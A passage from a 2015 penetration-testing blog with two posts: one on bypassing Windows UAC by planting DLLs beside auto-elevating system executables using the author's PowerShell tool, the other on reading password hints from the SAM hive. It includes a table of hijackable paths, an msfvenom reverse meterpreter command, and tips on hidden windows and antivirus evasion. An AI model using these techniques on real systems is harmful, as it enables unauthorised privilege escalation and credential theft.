Wednesday, September 30, 2015

Bypassing UAC with PowerShell

Recently during a Red Team engagement, I got shell access to some user machines using Client Side Attacks. In many cases, the users had administrative privileges but I was stuck into non-elevated PowerShell reverse shells.  UAC (User Account Control) was the spoilsport here. I hate UAC, it is annoying yet it "is not a security boundary". I read and tried stuff for bypassing UAC and learned that it is trivial to bypass it. In this post, we will go through various methods and code required to bypass UAC.

The tool of choice for bypassing UAC is UACME This awesome tool  implements various methods and is thankfully open source. Thanks to @hFirF0XAs.

As I always try to keep the post-exploitation phase within PowerShell, I tested UACME and implemented some of the methods using PowerShell . I give you Invoke-PsUACme.ps1. It could be found in the Escalation category of Nishang. 
Lets begin with the sysprep method which is the most commonly used method of bypassing UAC. Made famous by Leo Davidson in 2009 (details here), it involves the following steps:

1. Copy/plant a DLL in the C:\Windows\System32\sysprep directory. The name of the DLL depends on the Windows version.
CRYPTBASE.dll for Windows 7
shcore.dll for Windows 8
2.  Execute sysprep.exe from the above directory. It will load the the above DLL and execute it with elevated privileges. 

In fact, all the UAC bypass methods involve playing with DLL and executable names and locations. See the table below:

Method NameWrite DLL toDLL NameExecutable to Use
sysprepC:\Windows\System32\sysprep\CRYPTBASE.dll for Windows 7 and shcore.dll for Windows 8C:\Windows\System32\sysprep\sysprep.exe
oobeC:\Windows\System32\oobe\wdscore.dll for Windows 7, 8 and 10C:\Windows\System32\oobe\setupsqm.exe
actionqueueC:\Windows\System32\sysprep\ActionQueue.dll only for Windows 7C:\Windows\System32\sysprep\sysprep.exe
migwizC:\Windows\System32\migwiz\wdscore.dll for both Windows 7 and 8C:\Windows\System32\migwiz\migwiz.exe
cliconfgC:\Windows\System32\ntwdblib.dll for Windows 7, 8 and 10C:\Windows\System32\cliconfg.exe
winsatC:\Windows\System32\sysprep\Copy winsat.exe from C:\ Windows\System32\ to C:\Windows\System32\sysprep\ntwdblib.dll for Windows 7 and devobj.dll for Windows 8 and 10C:\Windows\System32\sysprep\winsat.exe
mmcC:\Windows\System32\ntwdblib.dll for Windows 7 and elsext.dll for Windows 8 and 10.C:\Windows\System32\mmc.exe eventvwr
Builds Tested:
Windows 7 build 6.1.7601.65536
Windows 8.1 build 6.3.9600.0 
Windows 10 build 10.0.10240.0
Now, to copy the DLL to the the sysprep directory, we need elevated privileges. The two most popular ways of achieving this elevation are: use an IFileOperation COM object or use Wusa.exe with its "extract" option.
Currently, Invoke-PsUACme uses the Wusa method. Since Wusa  is set to auto-elevate, we can use it to extract a cab file to the sysprep directory. A cab file could be created using the makecab utility.
Above commands are there just for explaining what Invoke-PsUACme does. We need not run the commands manually.
Now, the DLL which Invoke-PsUACme uses is Fubuki from the UACME project with a minor change. Instead of executing cmd.exe, we tell the DLL to execute cmd.bat from C:\Windows\Temp. It is this cmd.bat which will contain our payload to be executed on the target. This provides us a lot of flexibility while executing complex attacks.
Above DLLs (for 64 bit and 32 bit) are hard coded in the script in DLLBytes64 and DLLBytes32 variables. The script is able to determine the bit-ness of the process from which it is called and uses the apt DLL.

Coming to the more interesting part, Invoke-PsUACme could be used this way:
Nice, we are able to bypass UAC! The default payload just checks if the bypass was successful. Note that the -noexit parameter is passed to PowerShell in cmd.bat so that we can see the output.

Custom Payload

We can always use custom payloads as well:
Note that we need to specify the powershell.exe as well. Whatever is specified for the Payload parameter ends up in C:\Windows\Temp\cmd.bat. You can always change the path to the batch file using the PayloadPath parameter after changing it in the DLL.
We will come back to more practical use of the Payload parameter in a minute.

Custom DLL

To use a Custom DLL, we can use the CustomDLL64 and CustomDLL32 parameters. For example, lets use the original 64 bit Fubuki DLL from UACME and use it with Invoke-PsUACme
We can also prvide a byte array of DLLs to the DLLBytes64 and DLLBytes32 parameter.

Ok, fine. How is it useful?

Lets recreate the scenario with which I started the post, we have few reverse PowerShell shells with no elevated rights. We can use Invoke-PsUACme to execute commands and scripts with elevated rights. Lets use reverse TCP one liner from Nishang, encode it using Invoke-Encode and use it with Invoke-PsUACme:
Awesome! We successfully bypassed UAC and elevated our privileges. To verify it, we ran Get-PassHashes from Powerpreter.

Once elevated privileges are there, we can always elevate to SYSTEM using Enable-DuplicateToken from Nishang/Powerpreter.

In fact, after SYSTEM privs we can use Invoke-Mimikatz from Powersploit for using domain tokens as well. Get your Golden/Silver tickets right here! In case you cannot pull scripts from a web server as in above example, use Invoke-Encode to encode them as compressed base64 and use with the EncodedCommand (-e or -encodecommand) parameter of powershell.exe. You may like to use '-WindowStyle hidden' paramter of PowerShell to avoid showing any pop ups to the user.

There are limitless opportunities with this. Although, metasploit has its own implementation of UAC bypass, we can get a meterpreter with elevated privileges. We can generate a meterpreter in PowerShell using msfvenom: ./msfvenom -p windows/x64/meterpreter/reverse_https LHOST= -f psh-reflection

I can never stop stressing how useful PowerShell is for pen testing Windows network. For example, we can use Invoke-PsUACme as a payload with the Client Side attacks initially as well. Lets use Invoke-PsUACme with Out-Word from Nishang. Lets make the function call from the Invoke-PsUACme script itself to avoid unnecessary complex command.

Sweet! An elevated interactive reverse PowerShell shell.

As you can see implementing existing techniques in PowerShell is very rewarding. It not only increases the understanding of PowerShell but the technique as well.


Since, Invoke-PsUACme is based on the UACME project which itself implementd techniques used by malware, there are chances that DLLs dropped by it are detected by AV in future. Going by the past record, minor changes in the DLL source should solve this problem, whenever it arises.

Wusa.exe on Windows 10  has no "extract" option. Therefore, Invoke-PsUACme does not work on Windows 10 currently. Please feel free to implement IFileOperation or any other method. I welcome pull requests.

There are other implementations as well of UAC bypass in PowerShell. See this

To better know about the UAC bypass, follow the below links:

Hope you enjoyed the post!

Shameless self promotion

If you liked the post and want to learn more and/or want to support my research and work, join me for a two days training "PowerShell for Penetration Testers" at:
DeepSec, Vienna (November 17-18th, 2015) -

Friday, September 4, 2015

Extracting Windows Users Password Hints with PowerShell

This is a quick blog post about extracting Password Hints for Windows users using PowerShell. Recently, while playing with Windows Registry, I found that it is trivial to extract password hints from Registry. It is available with metasploit as well. Since, I do Post Exploitation almost completely with PowerShell, I wrote Get-PassHints.ps1 to extract password hints for Windows Users using PowerShell. The password hints are stored in the HKLM:\SAM registry hive and we must run Get-PassHints from an elevated shell to be able to read the SAM hive. Though SYSTEM access is required to access the SAM hive, this neat trick by an anonymous user helped me to change permissions of the HKLM:\SAM\SAM\Domains hive where the password hints are stored. This way, we can use Administrative access instead of SYSTEM to read the SAM hive.

Here is how to use Get-PassHints:

And this is how it looks like in action:

Get-PassHints is available in the Gather category of Nishang:

Nothing new or extraordinary here. In fact, a domain computer can't have password hints unless there is a local user created before joining the computer to a domain.

Hope you enjoyed this!

If you liked the post and want to learn more and/or want to support my research and work, join me for a two days training "PowerShell for Penetration Testers" at:
DeepSec, Vienna (November 17-18th, 2015) -